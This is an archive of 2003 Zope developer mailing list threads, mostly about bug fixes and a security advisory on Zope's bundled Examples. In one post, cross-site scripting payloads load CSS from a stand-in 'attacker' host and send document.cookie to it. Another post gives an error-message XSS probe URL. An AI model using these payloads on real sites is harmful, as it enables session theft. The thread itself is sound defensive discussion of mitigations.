Re: [Zope-dev] Memory Error
There we go, it occurred again. It's definitely the manipulating of catalog results; all the crashes are happening on ZCatalog searches. There are over 530 Megs of memory free at the time. But like I say, it's never occurring on my other boxes, so time to whip out some unit tests and the like ;)

-- 
Andy McKay
http://www.agmweb.ca

___
Zope-Dev maillist - [EMAIL PROTECTED]
http://mail.zope.org/mailman/listinfo/zope-dev
** No cross posts or HTML encoding! **
(Related lists -
 http://mail.zope.org/mailman/listinfo/zope-announce
 http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
On Mon, 2003-06-23 at 09:20, Jamie Heilman wrote:
> I'll submit a fixed Examples.zexp but I need to know how it's normally
> prepared, ownership, etc. Is there anything special I should do?

No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code.

The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present.

seb
[Zope-dev] 2.6.2b3?
Just a quick repeat from last week in case it slipped from anyone's radar... Here is the important bit again:

a) Any reason why I shouldn't merge BTree bugfixes into the 2.6 branch?
b) If no, how about a 2.6.2b3?

seb

On Wed, 2003-06-18 at 17:25, seb bacon wrote:
> There have been various BTree fixes lounging in the HEAD since Jan 2003
> which I'd like to get into a release, basically because we have seen one
> of the bugs causing segfaults in production - this is the culprit:
>
> http://cvs.zope.org/Zope/lib/python/BTrees/BTreeItemsTemplate.c.diff?r1=1.17r2=1.18
>
> a) Any reason why I shouldn't merge it into the 2.6 branch?
> b) Any chance of a 2.6.2b3?
>
> Seb
Re: [Zope-dev] funky side-effects, possible bug in HTTPRequest.py
In article [EMAIL PROTECTED] you write:
>         # Untrusted data *after* trusted data
>         v = self.form.get(key, _marker)
>         if v is not _marker:
>             other[key] = v  # *boom*
>             return v
>
> That magical promotion of the key value to the other dictionary is what
> tripped me up.

Wouldn't other.setdefault(key, v) be better? So a variable already existing in other wouldn't get clobbered.

Florent

-- 
Florent Guillaume, Nuxeo (Paris, France)   +33 1 40 33 79 87
http://nuxeo.com   mailto:[EMAIL PROTECTED]
Re: [Zope-dev] 2.6.2b3?
Post this to zodb-dev.

-Casey

On Monday 23 June 2003 05:12 am, seb bacon wrote:
> Just a quick repeat from last week in case it slipped from anyone's
> radar... Here is the important bit again:
>
> a) Any reason why I shouldn't merge BTree bugfixes into the 2.6 branch?
> b) If no, how about a 2.6.2b3?
>
> seb
>
> On Wed, 2003-06-18 at 17:25, seb bacon wrote:
> > There have been various BTree fixes lounging in the HEAD since Jan 2003
> > which I'd like to get into a release, basically because we have seen one
> > of the bugs causing segfaults in production - this is the culprit:
> >
> > http://cvs.zope.org/Zope/lib/python/BTrees/BTreeItemsTemplate.c.diff?r1=1.17r2=1.18
> >
> > a) Any reason why I shouldn't merge it into the 2.6 branch?
> > b) Any chance of a 2.6.2b3?
> >
> > Seb
Re: [Zope-dev] weak examples, weak exploits
I would be in favor of making the Examples opt-in like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.

-Casey

On Monday 23 June 2003 05:12 am, Jamie Heilman wrote:
> seb bacon wrote:
> > No. Just go ahead and make the changes. It would be instructive for
> > others reading the examples to add a comment or two explaining the
> > rationale behind the extra checking code.
>
> 'k I can do that
>
> > The file upload vulnerability was fixed in version 1.3 of Examples.zexp,
> > though. The reason it's still turning up in 2.6.x versions is probably
> > due to upgrades. Therefore I suppose additionally there should be a
> > patch which examines the ZODB on startup and prints a warning if an old
> > Examples folder is present.
>
> You know, ironically, I don't think this advisory even covers that hole.
> There's obvious DoS potential in the guest book and such, but that's
> easily limited without degrading the value of the example. Anyway, I'll
> scrape over the examples and see what I can clean up.
>
> --
> Jamie Heilman                     http://audible.transient.net/~jamie/
> Most people wouldn't know music if it came up and bit them on the ass.
>                                                          -Frank Zappa
RE: [Zope-dev] 2.6.2b3?
Tim says that this has been merged into the 2.6 branch (last week).

Brian Lloyd        [EMAIL PROTECTED]
V.P. Engineering   540.361.1716
Zope Corporation   http://www.zope.com

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of seb bacon
Sent: Monday, June 23, 2003 4:13 AM
To: [EMAIL PROTECTED]
Subject: [Zope-dev] 2.6.2b3?

Just a quick repeat from last week in case it slipped from anyone's radar... Here is the important bit again:

a) Any reason why I shouldn't merge BTree bugfixes into the 2.6 branch?
b) If no, how about a 2.6.2b3?

seb

On Wed, 2003-06-18 at 17:25, seb bacon wrote:
> There have been various BTree fixes lounging in the HEAD since Jan 2003
> which I'd like to get into a release, basically because we have seen one
> of the bugs causing segfaults in production - this is the culprit:
>
> http://cvs.zope.org/Zope/lib/python/BTrees/BTreeItemsTemplate.c.diff?r1=1.17r2=1.18
>
> a) Any reason why I shouldn't merge it into the 2.6 branch?
> b) Any chance of a 2.6.2b3?
>
> Seb
[Zope-dev] Re: Ordered Folder again
Hi!

Florent Guillaume wrote:
> But FWIW, note that in Nuxeo CPS we've always been using a monkey patch
> that added ordering to Folder without any problem.
> (http://cvs.nuxeo.org/cgi-bin/viewcvs.cgi/OrderedFolderSupportPatch/)

CPS doesn't subclass from PortalFolder? If CPS would have its own class like PloneFolder in Plone, you could just mix in OrderSupport.

But maybe CMFCore.PortalFolder should mix in OrderSupport? Would that help to solve your problem?

Cheers, Yuppie
Re: [Zope-dev] weak examples, weak exploits
On Mon, 23 Jun 2003 01:20:35 -0700 Jamie Heilman [EMAIL PROTECTED] wrote:
> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
[snip]
> apps, and apart from 1 and 3 there are probably legitimate bugs there.

Related issues: CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a, as far as the site permits anonymous users or persons without good references to write.

To cope with the matter, I stupidly put in multiple string substitutions:

  t = re.sub(r'(?i)(<[^d]*iframe[^>]*>)', r'<disabled \1', t)
  t = re.sub(r'(?i)(<[^d]*iframe[^>]*>)', r'<disabled \1', t)
  t = re.sub(r'(?i)(<[^d]*iframe[^>]*>)', r'<disabled \1', t)

It would be appreciated if someone advised me of a more general and smart way. I know that Zope's StructuredText itself does not handle such a case, and that kind of implementation may be left to each developer. If it had the ability to avoid them, it would be much better, I think.

Another example: the following sample may allow a malicious.css import from outside of the site. Put #1 or #2 in a StructuredText page.

  #1
  <LINK rel=stylesheet href=http://attacker/malicious.css>

  #2
  <STYLE type=text/css>
  @import url('http://attacker/malicious.css');
  </STYLE>

  # example of malicious.css (http://attacker/malicious.css)
  body { left: expression(eval('document.location=http://attacker/+document.cookie;')) }

For example, make a 'Document' in a CMFDefault site, and put #1 in the reply form (DiscussionItem) against the original document, etc. It seems CMFDefault is vulnerable to this attack.

Any general remedy for that kind of exploit?

-- 
Kazuya Fukamachi
Re: [Zope-dev] weak examples, weak exploits
Andy McKay wrote:
> Casey Duncan wrote:
> > I would be in favor of making the Examples opt-in like the Zope
> > tutorial. It seems silly to have it in every ZODB by default. Make
> > people add it if they want it.
>
> +1 a simple "How to add the examples to the ZODB" at the top of the help
> would be good. Mind you I really don't want the HelpSys in my ZODB either :)

Removing the help system could also appreciably boost startup time. I can't remember the last time I used the help system, yet it creates a ZCatalog for each Zope product. It would be beneficial to allow users to disable it completely.

Shane
[Zope-dev] Re: Ordered Folder again
On Mon, 2003-06-23 at 17:17, Yuppie wrote:
> Florent Guillaume wrote:
> > But FWIW, note that in Nuxeo CPS we've always been using a monkey patch
> > that added ordering to Folder without any problem.
> > (http://cvs.nuxeo.org/cgi-bin/viewcvs.cgi/OrderedFolderSupportPatch/)
>
> CPS doesn't subclass from PortalFolder? If CPS would have its own class
> like PloneFolder in Plone, you could just mix in OrderSupport.

We could, except that
- we want to be usable with standard CMF objects
- everybody wants ordering

> But maybe CMFCore.PortalFolder should mix in OrderSupport? Would that
> help to solve your problem?

That's definitely a thing that would be useful, but I still stand by my proposal.

Florent

-- 
Florent Guillaume, Nuxeo (Paris, France)   +33 1 40 33 79 87
http://nuxeo.com   mailto:[EMAIL PROTECTED]
[Zope-dev] Re: Ordered Folder again
Hi Florent!

Florent Guillaume wrote:
> > CPS doesn't subclass from PortalFolder? If CPS would have its own class
> > like PloneFolder in Plone, you could just mix in OrderSupport.
>
> We could, except that
> - we want to be usable with standard CMF objects

Was just asking. I think you're doing the Right Thing.

> - everybody wants ordering

Well, you want ordering, I want ordering, many other people want it. But maybe it's a special content management need.

> > But maybe CMFCore.PortalFolder should mix in OrderSupport? Would that
> > help to solve your problem?
>
> That's definitely a thing that would be useful, but I still stand by my
> proposal.

Wish you good luck! I'm not very happy with the changes you propose, but if it helps to convince people ...

Cheers, Yuppie
[Zope-dev] Re: weak examples, weak exploits
Casey Duncan wrote:
> I would be in favor of making the Examples opt-in like the Zope tutorial.
> It seems silly to have it in every ZODB by default. Make people add it if
> they want it.

Many, many moons ago I created evan-examples-branch, which allows individual Products to offer sample code without (magically or otherwise) forcing them upon the user. I'd love to see it revived, perhaps as Examples/Optional Extras in order to cover the Hurt system as well.

The basic idea is to look for an XML manifest file 'examples/index.xml' in each Product. It probably wouldn't be very hard to use ZConfig instead of XML. Here is the PageTemplates index.xml:

  <example name="Assorted Examples">
    <description>
      This is a set of examples of the use of page templates.
      It includes examples of batching, macros, and trees.
    </description>
    <payload>
      <import file="zpt_examples.zexp"/>
    </payload>
    <view url="zpt_examples/"/>
  </example>

  <!--
  This file can contain any number of examples. Each one consists of an
  <example> with a 'name' attribute, containing exactly one <description>.
  The name and description are displayed in the Examples page.
  <description> can have a 'format' attribute set to 'plain' (the default),
  'stx' (structured text), or 'html'.

  An <example> can contain <payload> elements. Each <payload> can contain
  any number of <import>, <execute>, and <call> elements. These are
  processed in order when an example is selected from the Examples page.
  <import> must have a 'file' attribute that names a file in the 'examples'
  directory to be imported. <execute> must have a 'file' attribute that
  names a file to be run with execfile. <call> must have a 'path' attribute
  that gives the path to a Zope object to be called.

  An <example> can contain at most one <view> element. The 'url' attribute
  of a <view> is the URL to view after all payload elements have been
  processed. This URL can be relative to the current folder.
  -->

-- 
Cheers,
Evan @ 4-am
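A loader for the manifest format described above, as an added example (not evan-examples-branch's own code): it enforces the rules in the comment (exactly one description, a known format, the required attribute on each payload step, at most one view) and, because <import> and <execute> hand the named file to the installer, rejects file names that would escape the 'examples' directory. It assumes a manifest wraps its examples in a root element, here called <examples>, which the comment does not specify.

```python
import os
import xml.etree.ElementTree as ET

PAYLOAD_STEPS = {"import": "file", "execute": "file", "call": "path"}  # step tag -> required attribute
FORMATS = {"plain", "stx", "html"}

def _plain_filename(name):
    """True only for a bare file name inside 'examples' (no directories, no '..')."""
    return bool(name) and os.path.basename(name) == name and name not in (".", "..")

def parse_manifest(xml_text):
    """Parse an examples/index.xml manifest and return one dict per <example>.
    Raises ValueError for anything the format's comment forbids."""
    root = ET.fromstring(xml_text)
    examples = [root] if root.tag == "example" else root.findall("example")
    result = []
    for ex in examples:
        name = ex.get("name")
        if not name:
            raise ValueError("<example> needs a 'name' attribute")
        descs = ex.findall("description")
        if len(descs) != 1:
            raise ValueError(f"{name}: exactly one <description> required")
        fmt = descs[0].get("format", "plain")
        if fmt not in FORMATS:
            raise ValueError(f"{name}: unknown description format {fmt!r}")
        steps = []
        for payload in ex.findall("payload"):
            for step in payload:  # the installer processes these in document order
                attr = PAYLOAD_STEPS.get(step.tag)
                target = step.get(attr) if attr else None
                if target is None:
                    raise ValueError(f"{name}: bad payload step <{step.tag}>")
                if attr == "file" and not _plain_filename(target):
                    raise ValueError(f"{name}: {step.tag} file {target!r} escapes 'examples'")
                steps.append((step.tag, target))
        views = ex.findall("view")
        if len(views) > 1:
            raise ValueError(f"{name}: at most one <view> allowed")
        result.append({
            "name": name,
            "description": " ".join((descs[0].text or "").split()),
            "format": fmt,
            "steps": steps,
            "view": views[0].get("url") if views else None,
        })
    return result

# Constructed sample: the PageTemplates manifest quoted above, under the assumed <examples> root.
SAMPLE_MANIFEST = """<examples>
  <example name="Assorted Examples">
    <description>This is a set of examples of the use of page templates.
      It includes examples of batching, macros, and trees.</description>
    <payload><import file="zpt_examples.zexp"/></payload>
    <view url="zpt_examples/"/>
  </example>
</examples>"""
```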
[Zope-dev] zopeinstall, error in zope2.7 cvs
Hi,

My first version of the zopeinstaller is available. It currently only builds Python 2.2.3 and Zope 2.7, but I would like to enhance it to a full 'tinderbox'. See http://zwiki.org/PythonZopeTinderbox for details.

It currently builds Python 2.2.3 from tarball and Zope 2.7 from CVS. It uses 'aap' to do so (http://www.a-a-p.org). For the first version of the main.aap of Zope, see http://gewis.nl/~pieterb/zope/zopeinstall/

I found one error in Zope 2.7 CVS while working on the script. Zope doesn't seem to mind the http-port section in etc/zope.conf. I changed the address, but the zopeserver started at port 8080 (default).

This is my first installer/a-a-p script, so please give feedback.

Regards,
PieterB

-- 
http://zwiki.org/PieterB
Re: [Zope-dev] weak examples, weak exploits
seb bacon wrote:
> The file upload vulnerability was fixed in version 1.3 of Examples.zexp,
> though. The reason it's still turning up in 2.6.x versions is probably
> due to upgrades. Therefore I suppose additionally there should be a patch
> which examines the ZODB on startup and prints a warning if an old
> Examples folder is present.

I opted for a patch that simply removes all the magic auto-install crud and goes for the installer link on the quick-start page. As for previous Zope installations, well, I don't feel like trying to figure out how to examine the ZODB and warn people if they've got bad examples still installed; it strikes me as too much junk in the startup procedure, which is already too slow as it is. I say chalk it up as a lesson learned and move on.

As for my reworked examples, I added missing quoting to the navigation examples, size limits and entry limits to the guest book, size limits and entry limits to the file library, and additional sanity checking and robustness to just about everything. Examining the original advisory, this is how I break it down:

1) moot with the addition of SiteErrorLog
2) Examples/db no longer exists in the Examples; I'm unaware if it ever did. At any rate, not a problem.
3) moot with the addition of SiteErrorLog
3a) this is a problem, see below
3b) fixed in my reworking
3c) I was unable to reproduce this, maybe a bug with older Zopes?
extra notes) wtf? I have no idea what the advisory author was trying to say by including that diff, and I have a feeling he doesn't know either. I mean, it has the words 'examples' and 'security' in it, but that doesn't make it relevant.

There is, unfortunately, a snag. One of the exploits (3a), as it turns out, is actually a problem deeper down. To isolate a test case make a script like:

  ## Script (Python) "aww_shit_now_what"
  ##bind container=container
  ##bind context=context
  ##bind namespace=
  ##bind script=script
  ##bind subpath=traverse_subpath
  ##parameters=i
  ##title=
  ##
  return int(i)

Then call it: http://host/aww_shit_now_what=<b>old+flava'

This can be disarmed by ensuring that in your standard_error_message you quote the results of error_msg; however this isn't the default, and it will result in a lot of broken and ugly looking (albeit safer) error pages. I haven't fully figured out exactly what's going on with that whole thing yet. I have a feeling it's attributable to either raise_standardErrorMessage's smart tag searching, or some other auto-magical aspect of the error handling framework. (clues appreciated) In the meantime I suggest quoting error_msg.

-- 
Jamie Heilman                     http://audible.transient.net/~jamie/
...that's the metaphorical equivalent of flopping your wedding tackle into a lion's mouth and flicking his lovespuds with a wet towel, pure insanity...
                                                                 -Rimmer
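What the quoting changes, as an added example (constructed here; not Zope's publisher or the stock standard_error_message): the script's int() raises a ValueError whose message repeats the submitted value, so an error page that inserts error_msg unquoted hands the request's own text back to the browser as markup, while html.escape on error_msg is the quoting the post recommends.

```python
import html

def aww_shit_now_what(i):
    """The Python Script from the post, as a plain function."""
    return int(i)

def error_page(error_type, error_value, quote):
    """Minimal stand-in for standard_error_message. quote=False inserts
    error_msg raw, as the default page does; quote=True escapes it."""
    shown = html.escape(error_value) if quote else error_value
    return ("<h2>Site Error</h2>"
            f"<p><b>Error Type:</b> {html.escape(error_type)}</p>"
            f"<p><b>Error Value:</b> {shown}</p>")

def publish(script, form, quote=True):
    """Toy publisher: call the script with the form data and, on failure,
    render the exception the way the error page receives error_type/error_value."""
    try:
        return str(script(**form))
    except Exception as exc:
        return error_page(type(exc).__name__, str(exc), quote)

# Constructed request mirroring the post's ?i=<b>old+flava' probe, after form decoding.
PROBE = {"i": "<b>old flava'"}
```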
Re: [Zope-dev] weak examples, weak exploits
Jamie Heilman wrote:
> Then call it: http://host/aww_shit_now_what=<b>old+flava'

er, http://host/aww_shit_now_what?i=<b>old+flava' rather.

-- 
Jamie Heilman                     http://audible.transient.net/~jamie/
Paranoia is a disease unto itself, and may I add, the person standing next to you may not be who they appear to be, so take precaution.
                                                  -Sathington Willoughby